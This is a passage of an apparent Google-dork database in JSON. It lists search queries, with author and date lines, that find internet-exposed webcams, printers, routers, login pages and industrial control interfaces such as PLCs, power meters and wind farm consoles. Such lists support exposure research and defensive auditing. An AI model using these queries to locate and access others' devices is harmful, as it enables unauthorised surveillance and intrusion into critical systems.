intitle:\"NetCamXL*\" inurl:index.html\r\n\r\n# Various online devices (webcams).\r\n\r\n# Date: 15/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/index.html?size=2&mode=4", "description": "Dorks: inurl:/index.html?size=2&mode=4\r\n\r\nCategory: Various Online Devices\r\n\r\nSummary:\r\nA Google dork that gives the online camera login information."}, {"dork": "inurl: 1051/viewer/live/index.html?lang=en", "description": "# Google Dork inurl: 1051/viewer/live/index.html?lang=en\r\n\r\n# Exploit Author: Emre Durmaz"}, {"dork": "inurl:/homej.html?", "description": "#Exploit Title : Various online devices\r\n#Google Dork : inurl:/homej.html?\r\n#Date : 06/11/2020\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\nSanu Jose M"}, {"dork": "inurl:/Jview.htm + \"View Video - Java Mode\"", "description": "# Google Dork: inurl:/Jview.htm + \"View Video - Java Mode\"\r\n# Various online devices.\r\n# Date: 17/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"view.shtml\" \"Network\"", "description": "#Exploit Title : Various online devices (webcams).\r\n#Google Dork : inurl:\"view.shtml\" \"Network\"\r\n#Date : 18/11/2020\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\nSanu Jose M"}, {"dork": "inurl:\"view.shtml\" \"camera\"", "description": "#Exploit Title : Various online devices (webcams).\r\n#Google Dork : inurl:\"view.shtml\" \"camera\"\r\n#Date : 18/11/2020\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "inurl:\"/cgi-bin/guestimage.html\" \"Menu\"", "description": "# Google Dork: inurl:\"/cgi-bin/guestimage.html\" \"Menu\"\r\n# Various online devices.\r\n# Date: 24/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"change the Administrator Password.\" intitle:\"HP LaserJet\" -pdf", "description": "# Google Dork: \"change the Administrator Password.\" intitle:\"HP LaserJet\" -pdf\r\n# HP Printer login portals.\r\n# Date: 25/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl: inurl:\"view.shtml\" ext:shtml", "description": "#Google Dork : inurl: inurl:\"view.shtml\" ext:shtml\r\n# shows devices connected\r\n#Exploit Author : ANURAG K P"}, {"dork": "intext:\"Connection\" AND \"Network name\" AND \" Cisco Meraki cloud\" AND \"Security Appliance details\"", "description": "Dorks: intext:\"Connection\" AND \"Network name\" AND \" Cisco Meraki cloud\" AND \"Security Appliance details\"\r\nCategory: Various Online Devices\r\nSummary:\r\nA Google dork that gives the Cisco Meraki Firewall information."}, {"dork": "inurl:/Jview.htm + intext:\"Zoom :\"", "description": "Dorks: inurl:/Jview.htm + intext:\"Zoom :\"\r\nCategory: Various Online Devices\r\nSummary:\r\nA Google dork that gives the online camera information."}, {"dork": "intitle:\"Agent web client: Phone Login\"", "description": "# Google Dork: intitle:\"Agent web client: Phone Login\"\r\n# Pages containing login portals.\r\n# Date: 3/12/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"System\" + \"Toner\" + \"Input Tray\" + \"Output Tray\" inurl:cgi", "description": "# Google Dork: \"System\" + \"Toner\" + \"Input Tray\" + \"Output Tray\" inurl:cgi\r\n\r\n# Various online devices (printers).\r\n\r\n# Date: 3/12/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"NetCamXL*\"", "description": "#Exploit Title :Various online devices.\r\n\r\n#Google Dork :intitle:\"NetCamXL*\"\r\n\r\n#Date : 2/12/2020\r\n\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "intitle:\"NetCamSC*\"", "description": "#Exploit Title :Various online devices.\r\n\r\n#Google Dork : intitle:\"NetCamSC*\"\r\n\r\n#Date : 2/12/2020\r\n\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "AXIS Camera exploit", "description": "#Exploit Title : AXIS Camera View (CCTV).\r\n#Google Dork : intitle:\"Live View / - AXIS\" | inurl:/mjpg/video.mjpg?timestamp\r\n# Exploit Author: RedHackBro\r\n\r\n\r\nThanks,\r\nRedHackBro"}, {"dork": "inurl:/Jview \"zoom\"", "description": "#Exploit Title : Various Online Devices.\r\n#Google Dork : inurl:/Jview \"zoom\"\r\n#Summary :A Google dork that gives the online camera information.\r\n#Date : 11/01/2021\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\nSanu Jose M"}, {"dork": "site:*/dyn_sensors.htm \"ID\"", "description": "# Google Dork: site:*/dyn_sensors.htm \"ID\"\r\n# Various online devices.\r\n# Date: 27/1/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:dtm.html intitle:1747-L551", "description": "# Google Dork: inurl:dtm.html intitle:1747-L551\r\n# Various online devices.\r\n# Date: 27/1/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:login.html intitle:\"Archer C7\"", "description": "Dork: inurl:login.html intitle:\"Archer C7\""}, {"dork": "intitle:\"IP Webcam\" inurl:\"/greet.html\"", "description": "Dork: intitle:\"IP Webcam\" inurl:\"/greet.html\""}, {"dork": "\"Account\" \"Password\" \"All rights reserved\" intitle:\"HG8245\"", "description": "Dork: \"Account\" \"Password\" \"All rights reserved\" intitle:\"HG8245\""}, {"dork": "intitle:\"D-LINK SYSTEMS, INC. | Web File Access : Login\"", "description": "Dork: intitle:\"D-LINK SYSTEMS, INC. | Web File Access : Login\""}, {"dork": "inurl:login.html intitle:\"GPON Home Gateway\"", "description": "Dork: inurl:login.html intitle:\"GPON Home Gateway\""}, {"dork": "inurl:\"portal.mwsl\" \"Status\"", "description": "# Google Dork: inurl:\"portal.mwsl\" \"Status\"\r\n\r\n# Various online devices (Siemens S7 series of PLC controllers - SCADA)\r\n\r\n# Date: 9/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Intelbras\" inurl:cgi-bin/firmware.cgi?formNumber=200", "description": "# Dork: intitle:\"Intelbras\" inurl:cgi-bin/firmware.cgi?formNumber=200"}, {"dork": "intitle:(\"WebRTU z2\" | \"WebRTU z1\") -pdf", "description": "# Google Dork: intitle:(\"WebRTU z2\" | \"WebRTU z1\") -pdf\r\n\r\n# Various online devices (mostly industrial systems).\r\n\r\n# Date: 25/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:(\"OnCell Web Console\" | \"Series Web Console\" | \"-HSPA Series Web\" | \"-HSDPA Series Web\") \"MOXA OnCell\" \"Username :\" \"Password :\" -pdf", "description": "# Google Dork: intitle:(\"OnCell Web Console\" | \"Series Web Console\" | \"-HSPA Series Web\" | \"-HSDPA Series Web\") \"MOXA OnCell\" \"Username :\" \"Password :\" -pdf\r\n\r\n# Various online devices.\r\n\r\n# Date: 25/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"PowerLogic ION\" + \"Control\" + \"Diagnostic\" + \"Home\" + \"Maintenance\" + \"Monitoring\"", "description": "# Google Dork: intitle:\"PowerLogic ION\" + \"Control\" + \"Diagnostic\" + \"Home\" + \"Maintenance\" + \"Monitoring\"\r\n\r\n# Various online devices (Power Meter PLC).\r\n\r\n# Date: 25/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Total Web Solutions\" + \"Meter Name\"", "description": "# Google Dork: intitle:\"Total Web Solutions\" + \"Meter Name\"\r\n\r\n# Various online devices (Power Monitoring Meter/Software).\r\n\r\n# Date: 01/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"Copyright(C) CONTEC CO.LTD\"", "description": "# Category: Various online devices\r\n\r\n# Description: Find dashboards of several measurement systems for \r\nphotovoltaic power generation\r\n\r\n# Google Dork: \"Copyright(C) CONTEC CO.LTD\"\r\n\r\n# Vendor Homepage: https://www.contec.com/products-services/environmental-monitoring/solarview/pv-package/sv-cpt-pack01/feature/\r\n\r\n# Author: js-on\r\n\r\n# Date: 28/2/2021\r\n\r\nCheers!"}, {"dork": "intitle:\"Remote UI: Login:\" \"System Manager ID:\"", "description": "# Google Dork: intitle:\"Remote UI: Login:\" \"System Manager ID:\"\r\n\r\n# Various online devices (Canon printer servers).\r\n\r\n# Date: 02/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Nordex Control\" + \"Wind Farm Total Summary\"", "description": "# Google Dork: intitle:\"Nordex Control\" + \"Wind Farm Total Summary\"\r\n\r\n# Various online devices (Nordex wind turbine farms).\r\n\r\n# Date: 02/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Keenetic Web\"", "description": "# Google Dork: intitle:\"Keenetic Web\"\r\n\r\n# Various online devices (Keenetic Smart Home).\r\n\r\n# Date: 03/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/main/main.html \"Administrator Settings\"", "description": "# Google Dork: inurl:/main/main.html \"Administrator Settings\"\r\n\r\n# Various online devices (admin pages of Brother printers).\r\n\r\n# Date: 02/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Advanced Setup - Security - Admin User Name & Password\"", "description": "# Google Dork: intitle:\"Advanced Setup - Security - Admin User Name & Password\"\r\n\r\n# Various online devices (ActionTec modem configuration).\r\n\r\n# Date: 03/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*.*/level/15/exec/-/ \"Exec Configure\"", "description": "# Google Dork: site:*.*/level/15/exec/-/ \"Exec Configure\"\r\n\r\n# Various online devices (Cisco).\r\n\r\n# Date: 03/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"ePMP 2000\" \"notifications\" \"Menu\" -pdf", "description": "# Google Dork: intitle:\"ePMP 2000\" \"notifications\" \"Menu\" -pdf\r\n\r\n# Various online devices.\r\n\r\n# Date: 12/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"ContaCam\" \"Snapshot Image\"", "description": "# Google Dork: intitle:\"ContaCam\" \"Snapshot Image\"\r\n\r\n# Various online devices.\r\n\r\n# Date: 15/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*/tcpipv4.htm", "description": "# Google Dork: site:*/tcpipv4.htm\r\n\r\n# Various online devices.\r\n\r\n# Date: 17/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"HD IP Camera\" \"Remember me\" \"User name\" -.com -pdf", "description": "# Google Dork: intitle:\"HD IP Camera\" \"Remember me\" \"User name\" -.com -pdf\r\n\r\n# Various online devices.\r\n\r\n# Date: 17/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:set_config_security.htm", "description": "# Google Dork: inurl:set_config_security.htm\r\n\r\n# Various online devices.\r\n\r\n# Date: 17/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"webcamxp 5\" intext: \"live stream\"", "description": "# Dork: *intitle:\"webcamxp 5\" intext: \"live stream\"*"}, {"dork": "inurl:\"userimage.html\" \"Live\" \"Open\"", "description": "# Google Dork: inurl:\"userimage.html\" \"Live\" \"Open\"\r\n# Various online devices.\r\n# Date: 17/03/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/view/viewer_index.shtml", "description": "# Title: IP Cameras\r\n\r\n# Google Dork: inurl:/view/viewer_index.shtml\r\n\r\n# Date: 19/03/2021\r\n\r\n# Author: Tobias Marcotto\r\n\r\n# Description: Find IP Cameras"}, {"dork": "inurl:set_config_networkIP.html", "description": "# Google Dork: inurl:set_config_networkIP.html\r\n\r\n# Various online devices.\r\n\r\n# Date: 17/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*/tcpipv6.htm", "description": "# Google Dork: site:*/tcpipv6.htm\r\n\r\n# Various online devices.\r\n\r\n# Date: 23/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/guestimage.html", "description": "# Title: IP Cameras\r\n\r\n# Google Dork: inurl:/guestimage.html\r\n\r\n# Date: 29/03/2021\r\n\r\n# Author: Tobias Marcotto\r\n\r\n# Description: Find IP Cameras"}, {"dork": "inurl:plc/webvisu.htm intitle:\"CoDeSys WebVisualization\"", "description": "# Google Dork: inurl:plc/webvisu.htm intitle:\"CoDeSys WebVisualization\"\r\n\r\n# Various online devices (PLC/SCADA web visual interface)\r\n\r\n# Date: 25/03/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"openHAB\" intext:\"Welcome to openHAB\" \"Basic UI\" \"Paper UI\"", "description": "# Google Dork: intitle:\"openHAB\" intext:\"Welcome to openHAB\" \"Basic UI\" \"Paper UI\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 25/03/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode\r\n\r\n\r\n\r\n--\r\n\r\nThanks & Regards,\r\n\r\nMugdha Peter Bansode"}, {"dork": "intext:\"Inserire il proprio codice per accedere al sistema\" \"Inserire codice\"", "description": "# Google Dork: intext:\"Inserire il proprio codice per accedere al sistema\" \"Inserire codice\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 31/03/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode\r\n\r\n\r\n-- \r\nThanks & Regards,\r\nMugdha Peter Bansode"}, {"dork": "inurl:m_login.htm \"Somfy\"", "description": "# Google Dork: inurl:m_login.htm \"Somfy\"\r\n\r\n# Various online devices (Smart Home Devices).\r\n\r\n# Date: 02/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/intouch-base/rest/nlogin\" intitle:\"InTouch\"", "description": "# Google Dork: inurl:\"/intouch-base/rest/nlogin\" intitle:\"InTouch\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 07/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:\"/index.html\" intitle:\"Unitronics PLC\"", "description": "# Google Dork: inurl:\"/index.html\" intitle:\"Unitronics PLC\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 07/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Vodafone Vox UI\" | intitle:\"Residential Gateway Login\"", "description": "# Google Dork: intitle:intitle:\"Vodafone Vox UI\" | intitle:\"Residential Gateway Login\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 08/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Properties - Xerox WorkCentre\" \"Machine Model:\" \"Machine Name\" -.com", "description": "# Google Dork: intitle:\"Properties - Xerox WorkCentre\" \"Machine Model:\" \"Machine Name\" -.com\r\n# Various online devices (Xerox printers).\r\n# Date: 13/04/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Polycom Login\" -.com", "description": "# Google Dork: intitle:\"Polycom Login\" -.com\r\n\r\n# Various online devices (Polycom Video Conferencing).\r\n\r\n# Date: 08/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Saia PCD Web-Server\"", "description": "# Google Dork: intitle:\"Saia PCD Web-Server\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 07/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"NETSuveillance WEB\"", "description": "# Google Dork: intitle:\"NETSuveillance WEB\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 08/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:pas_set_menu.html", "description": "# Google Dork: inurl:pas_set_menu.html\r\n\r\n# Various online devices (Canon printers).\r\n\r\n# Date: 13/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Sys Name\" System Summary Sensors", "description": "# Google Dork: intitle:\"Sys Name\" System Summary Sensors\r\n\r\n# Various online devices.\r\n\r\n# Date: 08/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Epson Web Control\" \"OSD Control Pad\"", "description": "# Google Dork: intitle:\"Epson Web Control\" \"OSD Control Pad\"\r\n\r\n# Various online devices (Epson printers).\r\n\r\n# Date: 13/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*/net/net/protocol.html", "description": "# Google Dork: site:*/net/net/protocol.html\r\n\r\n# Various online devices (printers).\r\n\r\n# Date: 16/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"HD-Network Real Time Monitoring System\" inurl:\"/login.asp\"", "description": "# Google Dork:intitle:\"HD-Network Real Time Monitoring System\" inurl:\"/login.asp\"\r\n\r\n# Pages Containing Login Portals\r\n\r\n# Date: 19/04/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Milesight Network Camera\" intext:\"Language\"", "description": "# DorK: intitle:\"Milesight Network Camera\" intext:\"Language\""}, {"dork": "inurl:ip_snmp.htm", "description": "# Dork: inurl:ip_snmp.htm\r\n\r\nBy using this dork, ip snmp configuration page can be found.\r\n\r\nThank you!\r\nPrakash"}, {"dork": "intitle:\"Bosch Security Systems\" \"LIVEPAGE\" + \"SETTINGS\" -.net -.com", "description": "# Google Dork: intitle:\"Bosch Security Systems\" \"LIVEPAGE\" + \"SETTINGS\" -.net -.com\r\n\r\n# Various Online Devices.\r\n\r\n# Date: 28/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"DD-WRT (build 21061) - Info\"", "description": "# Google Dork: intitle:\"DD-WRT (build 21061) - Info\"\r\n\r\n# Various Online Devices.\r\n\r\n# Date: 28/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:ip_password.htm", "description": "# Dork: inurl:ip_password.htm"}, {"dork": "intitle:\"DSM mobile\" intext:\"Loading...\"", "description": "# Google Dork:intitle:\"DSM mobile\" intext:\"Loading...\"\r\n\r\n# Various Online Devices.\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"Web Client\" inurl:\"webcamera.html\"", "description": "# Google Dork: intitle:\"Web Client\" inurl:\"webcamera.html\"\r\n\r\n# Various Online Devices.\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:/DeviceInformation/View \"Device Name\"", "description": "# Google Dork: inurl:/DeviceInformation/View \"Device Name\"\r\n\r\n# Various Online Devices.\r\n\r\n# Date: 28/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"NodeCore PoW Mining Pool\" \"NETWORK\" \"TYPE\" \"POOL ADDRESS\" \"FEE\"", "description": "# Google Dork: intitle:\"NodeCore PoW Mining Pool\" \"NETWORK\" \"TYPE\" \"POOL ADDRESS\" \"FEE\"\r\n# Various Online Devices\r\n# Date: 27/04/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Login\" inurl:\"/simple/view/login.html\"", "description": "# Google Dork: intitle:\"Login\" inurl:\"/simple/view/login.html\"\r\n\r\n# Various Online Devices.\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"LK IHC controller\" intext:\"LK IHC\"", "description": "# Google Dork: intitle:\"LK IHC controller\" intext:\"LK IHC\"\r\n# Various Online Devices\r\n# Date: 03/05/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Openstage IP Phone User\" \"IPv4\" \"DNS\"", "description": "# Google Dork: intitle:\"Openstage IP Phone User\" \"IPv4\" \"DNS\"\r\n# Siemens Openstage brand IP phones.\r\n# Date: 29/04/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"USB Port 1 (Public Data)\" + \"USB Port 2 (Public Data)\" \"Status\" -pdf", "description": "# Google Dork: \"USB Port 1 (Public Data)\" + \"USB Port 2 (Public Data)\" \"Status\" -pdf\r\n\r\n# Various Online Devices.\r\n\r\n# Date: 28/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/PRESENTATION/HTML/TOP/PRTINFO.HTML", "description": "# Exploit Title: Discover Publicly Available Epson Devices (printer,scanner etc.)\r\n# Google Dork: inurl:/PRESENTATION/HTML/TOP/PRTINFO.HTML\r\n# Date: 2021-05-06\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "inurl:/PRESENTATION/EPSONCONNECT", "description": "# Dork: Discover Publicly Available Epson Devices (printer,scanner etc.)\r\n# Google Dork: inurl:/PRESENTATION/EPSONCONNECT\r\n# Date: 2021-05-07\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "intext:@print.epsonconnect.com intitle:series", "description": "# Google Dork: intext:@print.epsonconnect.com intitle:series\r\n# Date: 2021-05-07\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "Google Dork: intitle:\"ZM - Console\"", "description": "# Google Dork: intitle:\"ZM - Console\"\r\n# Description: Find ZoneMinder (video surveillance software) list of conencted devices.\r\n# Date: 08/05/2021.\r\n# Exploit Author: Sohaib E.B.\r\n# Category: Pages Containing Console log."}, {"dork": "Google Dork: intitle:\"ZM - System Log\"", "description": "# Exploit Title: ZoneMinder Unprotected System Log.\r\n# Google Dork: intitle:\"ZM - System Log\"\r\n# Description: Find ZoneMinder (video surveillance software) System Logs.\r\n# Date: 08/05/2021.\r\n# Exploit Author: Sohaib E.B.\r\n# Category: Pages Containing System Logs."}, {"dork": "inurl:/login/?referer=/admin/ intext:cradlepoint", "description": "# Dork: inurl:/login/?referer=/admin/ intext:cradlepoint\r\n# (Cradlepoint Router) Various Online Devices\r\n# Exploit Author: Shivani Arya"}, {"dork": "allintext:\"Copyright CANON INC\" \"iR-ADV\"", "description": "# Dork: allintext:\"Copyright CANON INC\" \"iR-ADV\"\r\n# (Canon Printer) VArious Online Devices\r\n# Exploit Author: Shivani Arya"}, {"dork": "inurl:\"/cgi-bin/luci\" intext:\"Authorization Required\" intitle:\"LuCI\"", "description": "# Google Dork: inurl:\"/cgi-bin/luci\" intext:\"Authorization Required\" intitle:\"LuCI\"\r\n# (OpenWrt Router) Various Online Devices\r\n# Exploit Author: Shivani Arya"}, {"dork": "\"Name\" \"Password\" intitle:\"LANCOM 1790VA\"", "description": "# Dork: \"Name\" \"Password\" intitle:\"LANCOM 1790VA\""}, {"dork": "intitle:series \"Note: It is recommended to communicate via HTTPS for entering an administrator password.\"", "description": "# Exploit Title: Discover Publicly Available Devices (printer, scanner etc.)\r\n# Google Dork: intitle:series \"Note: It is recommended to communicate via HTTPS for entering an administrator password.\"\r\n# Date: 2021-05-14\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "inurl:/PRESENTATION/PSWD", "description": "# Exploit Title: Discover Publicly Available Epson Devices (printer, scanner etc.)\r\n# Google Dork: inurl:/PRESENTATION/PSWD\r\n# Date: 2021-05-14\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "inurl:/PRESENTATION/BONJOUR intitle:Series", "description": "# Exploit Title: Discover Publicly Available Epson Devices (printer, scanner etc.)\r\n# Google Dork: inurl:/PRESENTATION/BONJOUR intitle:Series\r\n# Date: 2021-05-14\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "intitle:\"Yealink\" inurl:\"servlet?m=\"", "description": "# Dork: intitle:\"Yealink\" inurl:\"servlet?m=\""}, {"dork": "intitle:HP LASERJET PRO MFP inurl:/SSI/index.htm", "description": "# Exploit Title: Discover Publicly Available Devices\r\n# Google Dork: intitle:HP LASERJET PRO MFP inurl:/SSI/index.htm\r\n# Date: 2021-05-14\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "intitle:\"Device(\" intext:\"ActiveX Mode (For IE Browser)\"", "description": "# Dork: intitle:\"Device(\" intext:\"ActiveX Mode (For IE Browser)\""}, {"dork": "intext:\"LANCOM 1781VA (over ISDN)\"", "description": "# Dork: intext:\"LANCOM 1781VA (over ISDN)\""}, {"dork": "intitle:\"Web Client for DVR\"", "description": "# Dork: intitle:\"Web Client for DVR\""}, {"dork": "intitle:\"Intelbras\" site:*/index.html", "description": "# Dork: intitle:\"Intelbras\" site:*/index.html"}, {"dork": "inurl:/portal/indicate intitle:Remote UI", "description": "# Exploit Title: Discover Publicly Available Devices\r\n# Google Dork: inurl:/portal/indicate intitle:Remote UI\r\n# Date: 2021-05-14\r\n# Exploit Author: Saptarshi Chatterjee"}, {"dork": "inurl:mobile.html intitle:webcamXP", "description": "# Exploit Title: Various Online Devices\r\n# Google Dork: inurl:mobile.html intitle:webcamXP\r\n# Date: 2021-05-21\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "intitle:\"supra IPC\"", "description": "# Dork: intitle:\"supra IPC\""}, {"dork": "intitle:\"Dell OpenManage Switch Administrator\" intext:\"Type in Username and Password, then click OK\"", "description": "# Dork: intitle:\"Dell OpenManage Switch Administrator\" intext:\"Type in Username and Password, then click OK\""}, {"dork": "intitle:\"Alarm Panel\" intext:\"Climax Tech. Co., Ltd.\"", "description": "# Dork: intitle:\"Alarm Panel\" intext:\"Climax Tech. Co., Ltd.\""}, {"dork": "intitle:\"webcamxp\" \"Flash JPEG Stream\"", "description": "# Exploit Title: Various Online Devices\r\n# Google Dork: intitle:\"webcamxp\" \"Flash JPEG Stream\"\r\n# Date: 2021-05-21\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "\"Username\" \"Password\" \"ZTE Corporation. All rights reserved.\"", "description": "# Dork: \"Username\" \"Password\" \"ZTE Corporation. All rights reserved.\""}, {"dork": "intitle:\"WF Series\" inurl:PRTINFO.html", "description": "# Exploit Title: Various Online Devices\r\n# Google Dork: intitle:\"WF Series\" inurl:PRTINFO.html\r\n# Date: 2021-05-25\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "\"NETGEAR, Inc. All rights reserved\" intitle:\"Netgear Prosafe Plus Switch\"", "description": "# Dork: \"NETGEAR, Inc. All rights reserved\" intitle:\"Netgear Prosafe Plus Switch\""}, {"dork": "intitle:\"Remote UI\" intext:\"Printer status\"", "description": "# Google Dork: intitle:\"Remote UI\" intext:\"Printer status\"\r\n# Various Online Devices\r\n# Date: 31/05/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"::: ACEmanager :::\"", "description": "# Dork: intitle:\"::: ACEmanager :::\""}, {"dork": "intitle:\"Camera Status\" inurl:/control/", "description": "# Exploit Title: Various Online Devices\r\n# Google Dork: intitle:\"Camera Status\" inurl:/control/\r\n# Date: 2021-05-21\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "intitle:\"Solar-Log\u2122\" intext:\"Build Revision\"", "description": "# Google Dork: intitle:\"Solar-Log\u2122\" intext:\"Build Revision\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 03/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"3CX Phone System Management Console\"", "description": "# Google Dork: intitle:\"3CX Phone System Management Console\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 03/06/2021\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "inurl:\"/web/guest/en/websys/webArch/mainFrame.cgi\"", "description": "# Google Dork: inurl:\"/web/guest/en/websys/webArch/mainFrame.cgi\"\r\n\r\n# Various Online Devices\r\n\r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"myhome\" intext:\"Tilgin. All rights reserved. Copyright and Trademark.\"", "description": "# Dork: intitle:\"myhome\" intext:\"Tilgin. All rights reserved. Copyright and Trademark.\""}, {"dork": "intitle:LANCOM \"A webbrowser with active JavaScript support is required.\"", "description": "# Exploit Title: Various Online Devices\r\n# Google Dork: intitle:LANCOM \"A webbrowser with active JavaScript support is required.\"\r\n# Date: 2021-05-20\r\n# Exploit Author: Anmol K Sachan"}, {"dork": "intitle:(\"Canon\" + \"series Network Configuration\" \"Basic Information\") + \"JavaScript is not enabled\"", "description": "# Google Dork: intitle:(\"Canon\" + \"series Network Configuration\" \"Basic Information\") + \"JavaScript is not enabled\"\r\n\r\n# Various online devices (Canon).\r\n\r\n# Date: 26/05/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"serverpush.htm\" \"IP Camera\" intext:\"Foscam\"", "description": "#Google Dork: inurl:\"serverpush.htm\" \"IP Camera\" intext:\"Foscam\"\r\n# Various Online Devices\r\n# Date: 28/06/2021\r\n# Exploit Author: Neha Singh\r\n\r\n\r\nThanks and Regards\r\nNeha Singh"}, {"dork": "intitle:\"CPU-Modul TROVIS 6610\"", "description": "# Google Dork: intitle:\"CPU-Modul TROVIS 6610\"\r\n\r\n# Various Online Devices\r\n\r\n# Date: 16/06/2021\r\n\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"Cambium\" inurl:top.cgi", "description": "# Google Dork: intitle:\"Cambium\" inurl:top.cgi\r\n\r\n# Category: Various Online Devices\r\n\r\n# Date: 05/07/2021\r\n\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:top.cgi intitle:\"Motorola ptp\"", "description": "# Google Dork: inurl:top.cgi intitle:\"Motorola ptp\"\r\n\r\n# Category: Various Online Devices\r\n\r\n# Date: 05/07/2021\r\n\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"vood Residential gateway\" inurl:vood/cgi-bin/", "description": "# Google Dork: intitle:\"vood Residential gateway\" inurl:vood/cgi-bin/\r\n\r\n# Category: Various Online Devices\r\n\r\n# Date: 09/07/2021\r\n\r\n# Exploit Author: s Thakur"}, {"dork": "intext:\"Egardia & WoonVeilig\" -site:\"linkedin.*\" -\"data-lead.com\" -\"getemail.io\" 